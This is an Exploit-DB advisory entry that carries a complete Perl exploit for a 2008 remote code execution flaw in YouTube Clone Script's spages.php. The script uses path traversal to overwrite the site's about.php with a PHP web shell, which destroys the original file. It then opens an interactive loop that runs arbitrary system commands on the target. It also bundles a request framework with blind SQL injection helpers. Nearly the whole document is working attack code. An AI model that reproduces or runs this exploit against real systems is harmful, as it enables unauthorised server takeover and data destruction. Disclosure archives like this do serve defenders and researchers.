YouTube Clone Script - 'spages.php' Remote Code Execution

EDB-ID:

5490

CVE:

N/A


Author:

Inphex

Type:

webapps


Platform:

PHP

Date:

2008-04-23


#!/usr/bin/perl 
#inphex
#/siteadmin/spages.php
#        include("../include/config.php");
#        include("../include/function.php");
#
#        if($_REQUEST['update'])
#        {
#                $file_path = $config['BASE_DIR']."/templates/".$_REQUEST['page'];
#                if(file_exists($file_path))
#                {
#                        $handle = fopen($config['BASE_DIR']."/templates/".$_REQUEST['page'], "w");
#                        fwrite($handle,stripslashes($_POST['body']));
#                        fclose($handle);
#                        $msg = "Page updated successfully";
#                }
#                else
#                        $err = "Page does not exist";
#        }
#
#        STemplate::assign('msg',$msg);
#        STemplate::assign('err',$err);
#        STemplate::display("siteadmin/spages.tpl");
#
#Very easy one: $_REQUEST['page'] is appended to BASE_DIR/templates/ with no
#normalisation, so a "../" in it reaches any existing file under BASE_DIR, and
#fopen(..., "w") then truncates that file and replaces its contents with the raw
#POST 'body'. file_exists() is the only check, so the target must already exist
#(the exploit below picks about.php, which it overwrites and does not back up).
#No authentication check is visible in this excerpt; if one lives in the included
#config.php/function.php, the write still needs an admin session.
#YouTube-Clone-Script is quite buggy, there are more bugs.

use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
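# Target from the command line: the base URL (scheme and host, no trailing
# slash) and the application path.  The path must end in "/" because it is
# joined to "siteadmin/spages.php" and "about.php" below without a separator.
$host_ = shift;
$path_ = shift;

# Refuse to run without both arguments.  The original printed the usage line
# unconditionally and then went on to send requests to an empty host/path.
if (!defined $host_ || $host_ eq "" || !defined $path_ || $path_ eq "") {
	die "usage: $0 http://host /path/\n";
}

# Stage 1: a single POST to siteadmin/spages.php.  `page` walks out of
# templates/ (the script only checks file_exists(), see the PHP excerpt
# above) and `body` becomes the new contents of that file.  The target is
# truncated and overwritten, not backed up -- the site's about.php is
# destroyed.  start() sends every value raw (no URI escaping) and sends the
# placeholder "key: value" header and "Cookie: key=value" verbatim; replace
# the cookie with a real admin session cookie if siteadmin/ is protected.
# The result slot (222) is not read back; stage 2 is the only check.
$info{'info'} = {
	"author" => ["inphex"],
	"name" => ["YouTube Clone Script Remote Code Execution"],
	"version" => [],
	"description" => ["This Script will exploit a Remote Code Execution vulnerability existing in the YouTube Clone Script\n"],
	"options" =>
	{
		"agent" => "",
		"proxy" => "",
		"default_headers" => [
			["key","value"]],
		"timeout" => 2,
		"cookie" =>
		{
			"cookie" => ["key=value"],
		},
	},
	"sending_options" =>
	{
		"host" => $host_,
		"path" => $path_."siteadmin/spages.php",
		"port" => 80,
		"method_a" => "REMOTE_CHECK",
		"attack" =>
		{
			"update" => ["get","update","1"],
			"path" => ["get","page","../about.php"],
			"content" => ["post","body","<?php echo system(\$_GET[cmd]); ?>"],
		},
	},
};
start($info{'info'}, 222);

# Stage 2: interactive shell.  Each line read is sent as ?cmd=<line> to the
# overwritten about.php and the response body (stored by start() in slot
# 221) is echoed.  Stop on EOF instead of looping forever with an undefined
# command.  Commands are not URI-escaped, so characters that mean something
# in a query string (&, #, %, +) will be mangled.
while (1) {
	print "\$";
	my $cmd = <STDIN>;
	last unless defined $cmd;
	chomp($cmd);
	$info{'info'} = {
		"options" =>
		{
			"agent" => "",
			"proxy" => "",
			"default_headers" => [
				["key","value"]],
			"timeout" => 2,
			"cookie" =>
			{
				"cookie" => ["key=value"],
			},
		},
		"sending_options" =>
		{
			"host" => $host_,
			"path" => $path_."about.php",
			"port" => 80,
			"method_a" => "CODE_EXECUTION",
			"attack" =>
			{
				"cmd" => ["get","cmd",$cmd],
			},
		},
	};
	start($info{'info'}, 221);
	my $content = ${$info{'info'}}{221}{'content'};
	print $content;
	print "\n";
}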
# start($config, $id [, $unused])
#
# Builds and sends one HTTP request described by $config->{'sending_options'}
# and stores the response body in $config->{$id}{'content'} (see attack()).
# $config->{'options'} supplies the LWP settings: timeout, proxy, agent,
# default headers and cookie.  Every top-level key other than 'options' and
# 'sending_options' is treated as banner text and its first element printed.
#
# The helpers below are written inside start(), but Perl compiles named subs
# into the package regardless of nesting; they share state through package
# globals ($a_, $id, $ua, $get_dA, $post_dA, the $h_*_xdsjaop variables)
# rather than through arguments.  Several lexicals declared here ($h, $jj,
# $ii, $hh, ...) are also referenced from those nested subs; a nested named
# sub only sees the first call's instance of such lexicals ("will not stay
# shared"), so behaviour on repeated calls (the interactive loop in the
# caller) should be verified rather than assumed.
sub start
{
	$a_ = shift;
	# No Exporter is loaded anywhere in this file, so this @EXPORT
	# assignment appears to have no effect -- left as found.
	@EXPORT		= qw( start $return $a_ ); 
	$id = shift;
	# Query-string and POST-body strings built from {'attack'} (see get_d_p_s).
	$get_dA = get_d_p_s("get");
	$post_dA = get_d_p_s("post");
	# NOTE(review): $c is declared twice in this list and $h is declared
	# again a few lines down; the later declarations win.
	my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
	my $jj = 1;
	my $ii = 48;
    my $hh = 1;
	my $ppp = 0;
	my $s = shift;
	my $a = "";
	my $res_p = "";
	my $h = "";
	# 'port' is read here but every URL built below is host.path only, so it
	# is never applied.
	($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xdsjaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
	$ua = LWP::UserAgent->new;
	$ua->timeout($a_->{'options'}{'timeout'});  
	if ($a_->{'options'}{'proxy'}) {
	    $ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
	}
	$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0"; 
	$ua->agent($agent); 
	{                                                 
		# Banner: for every top-level list that is not configuration
		# (author, name, description, ...) print its first element once per
		# element it holds.
		while (($k,$v) = each(%{$a_}))
			{
			if ($k ne "options" && $k ne "sending_options")
				{
				foreach $r (@{$a_->{$k}})
					{
					if ($a_->{$k}[0])
						{
						print $k.":".$a_->{$k}[0]."\n";
						}
					}
				}
			}


		# Every default_headers pair is sent verbatim, placeholders included.
		foreach $j (@{$a_->{'options'}{'default_headers'}})
			{    
			$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
			$m++;
			}

		# Only the first cookie entry is used, and only when it is non-empty.
		if ($a_->{'options'}{'cookie'}{'cookie'}[0])
			{          
			$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
			}

			

	}
	# The dispatch below is provided by a source-filter module imported at
	# the top of the file, not by core Perl.  Every branch except
	# SQL_INJECTION_BLIND ends in attack(), and so does the default, so the
	# caller's "REMOTE_CHECK" / "CODE_EXECUTION" values also run attack().
	switch ($method_m)        
	{
		case "attack" { &attack();}
		case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
		case "REMOTE_COMMAND_EXECUTION" { &attack();}
		case "REMOTE_CODE_EXECUTION" {&attack();}
		case "REMOTE_FILE_INCLUSION" { &attack();}
		case "LOCAL_FILE_INCLUSION" { &attack(); }
		else { &attack(); }  

	}


	# attack()
	# Sends the request: POST when any {'attack'} entry is of type "post",
	# otherwise GET.  The query string ($get_dA) is appended to the path in
	# both forms.  The response body is stored in $a_->{$id}{'content'} with
	# no status check.  The loops over {'attack'}{'regex'} copy capture
	# groups $1..$N (via the symbolic refs ${$jj}) into
	# $a_->{$id}{'regex'}; $jj and $h are never reset between entries.
	# Neither caller in this file sets a 'regex' key, so those loops do
	# nothing here.
	sub attack
	{
		
		if ($post_dA eq "") {
			$method = "get";
		} elsif ($post_dA ne "")
		{
			$method = "post";
		}
		if ($method eq "get") {  
			$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
			${$a_}{$id}{'content'} = $res_p;
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				
				# regex entry is [pattern, number_of_groups]; ${$jj} reads $1, $2, ...
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne "")
						{
						${$a_}{$id}{'regex'}[$h] = ${$jj};
						}
						$jj++;
					}
					$h++;
				}
		} elsif ($method eq "post")
		{
			# GET parameters still travel in the query string; POST body is
			# the form-encoded string from get_d_p_s("post").
			$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
		
			${$a_}{$id}{'content'} = $res_p;

			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
				while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
					{
					if (${$jj} ne "")
						{
						${$a_}{$id}{'regex'}[$h] = ${$jj};
						}
						$jj++;
					}
					$h++;
				}
		}

	}
	# sql_injection_blind()
	# Character-by-character blind extraction: for the current position $hh
	# it tries codes 48..90 through check(); each match is printed (lower-
	# cased), appended to $chr and advances $hh.  Not reachable from this
	# file's callers (method_a is never "SQL_INJECTION_BLIND").
	# NOTE(review): the exit test compares $#ffs with the scalar $ffs, which
	# is never assigned, and $chr/$hh are never reset -- looks unfinished,
	# confirm before relying on it.
	sub sql_injection_blind
	{
		while ()
			{
			while ($ii <= 90)
				{
				if(check($ii,$hh) == 1)
				{
					syswrite STDOUT,lc(chr($ii));
					$hh++;
					$chr = $chr.chr($ii);
					}
					$ii++;
			}
			push(@ffs,length($chr)); 
			if (($#ffs -1) == $ffs)
				{
				print "\nFinished/Error\n";
				exit;
				}
				$ii = 48;
		}
	}
	# check($code, $pos)
	# Substitutes $code/$pos for the "$i"/"$h" markers in the GET (and POST)
	# strings via modify(), sends the request and returns 1 if the response
	# matches the {'attack'}{'regex'} pattern at index $h, 0 otherwise; with
	# no patterns nothing is returned.  Both branches return inside the first
	# iteration, so the $h++ after them is unreachable.  The ($$) prototype
	# only affects parsing, not validation.  Prints "$code-$pos" as a debug
	# trace in the GET branch.  Assigns the outer lexicals $ii/$hh directly.
	sub check($$)
	{
		$ii = shift;
		$hh = shift;
		if (get_d_p_s("post") ne "")
			{
			$method = "post";
		} else { $method = "get";}
		if ($method eq "get")
			{
			$ppp++;
			$query = modify($get_dA,$ii,$hh);
			print $ii."-".$hh."\n";
			$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					return 1;
					}
					else 
				{
						return 0;
				}
				$h++;
			}
		} elsif ($method eq "post")
			{
			$ppp++;
			$query_g = modify($get_dA,$ii,$hh);
			$query_p = modify($post_dA,$ii,$hh);
			
			$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
			foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
				{
				if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
					{
					return 1;
					}
					else 
					{
						return 0;
					}
				$h++;
			}
		}
	}
	# modify($string, $code, $pos)
	# Replaces the span from the first to the last "$i" in $string with
	# $code, and the span from the first to the last "$h" with $pos, and
	# returns the result.  When neither marker is present the string is
	# printed instead and nothing (undef) is returned.
    sub modify($$$)
	{
	    $string = shift;
	    $replace_by = shift;
	    $replace_by1 = shift;

	    if ($string !~/\$i/ && $string !~/\$h/) {
		    print $string;
	        } elsif ($string !~/\$i/)
		{
		        $ff = substr($string,0,index($string,"\$h"));
	            $ee =  substr($string,rindex($string,"\$h")+2);
	            $string = $ff.$replace_by1.$ee;

	            return $string;
		} elsif ($string !~/\$h/)
		{
	        $f = substr($string,0,index($string,"\$i"));
	        $e = substr($string,rindex($string,"\$i")+2);
	        $string = $f.$replace_by.$e;
		    return $string;
		} else
		{
		    $f = substr($string,0,index($string,"\$i"));
	        $e = substr($string,rindex($string,"\$i")+2);
	        $string = $f.$replace_by.$e;

		    $ff = substr($string,0,index($string,"\$h"));
	        $ee =  substr($string,rindex($string,"\$h")+2);
	        $string = $ff.$replace_by1.$ee;

		    return $string;
		}
	}
	# get_d_p_s("get" | "post" | "header")
	# Walks $a_->{'sending_options'}{'attack'}, whose values are
	# [type, name, value]: "get" and "post" entries become "name=value" in
	# the package arrays @get/@post, "header" entries go into %header_dA.
	# Returns the requested part: the GET or POST string (entries joined
	# with "&", trailing "&" kept, in reverse push order) or the header hash.
	# NOTE(review): values are not URI-escaped, and @get/@post and $bb are
	# package globals that nothing in this file clears, so every call
	# re-pushes the entries -- check the query actually sent when start() is
	# called more than once.
	sub get_d_p_s
	{
		$g_d_p_s = shift;
		$post_data = "";
		$get_data = "";
		$header_data = "";
		%header_dA = ();
		while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
			{
			if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
				{

				$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
				}
				elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post") 
				{
					$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
					}
					elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
				{
				        $header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
				}
				$hp++;
			}
		# $k is reused here as a counter after the each() loop above emptied it.
		$yy = $#get;
		while ($bb <= $#get)
			{
			$get_data .= $get[$yy]."&";
			$bb++;
			$yy--;
			}
		$l = $#post;
		while ($k <= $#post)
			{
			
			$post_data .= $post[$l]."&";
			$k++;
			$l--;
			}
		if ($g_d_p_s eq "get")
			{
			
			return $get_data;
			}
			elsif ($g_d_p_s eq "post")
		{
			return $post_data;
		} elsif ($g_d_p_s eq "header")
		{
			return %header_dA;
		}
	}
	# get_data($host, $path)
	# GETs $host.$path and returns the response body without checking the
	# status.  "header" entries are pushed onto the agent's default headers
	# again on every call.  Note this overwrites the package globals
	# $h_host_h_xdsjaop/$h_path_h_xdsjaop set by start().
	sub get_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		%hash = get_d_p_s("header");
	    while (($u,$c) = each(%hash))
			{
			$ua->default_headers->push_header($u => $c);
			}
		$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
		return $req->content;
	}
	# post_data($host, $path, $content_type, $body)
	# POSTs $body to $host.$path with the given Content-Type and returns the
	# response body without checking the status.  Same header handling and
	# global overwriting as get_data().
	sub post_data
	{
		$h_host_h_xdsjaop = shift;
		$h_path_h_xdsjaop = shift;
		$content_type = shift;
		$send = shift;
		%hash = get_d_p_s("header");
	    while (($u,$c) = each(%hash))
			{
		    $ua->default_headers->push_header($u => $c);
			}
		$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
		$req->content_type($content_type);
		$req->content($send);
		$res = $ua->request($req);
		return $res->content;
	}

}

# milw0rm.com [2008-04-23]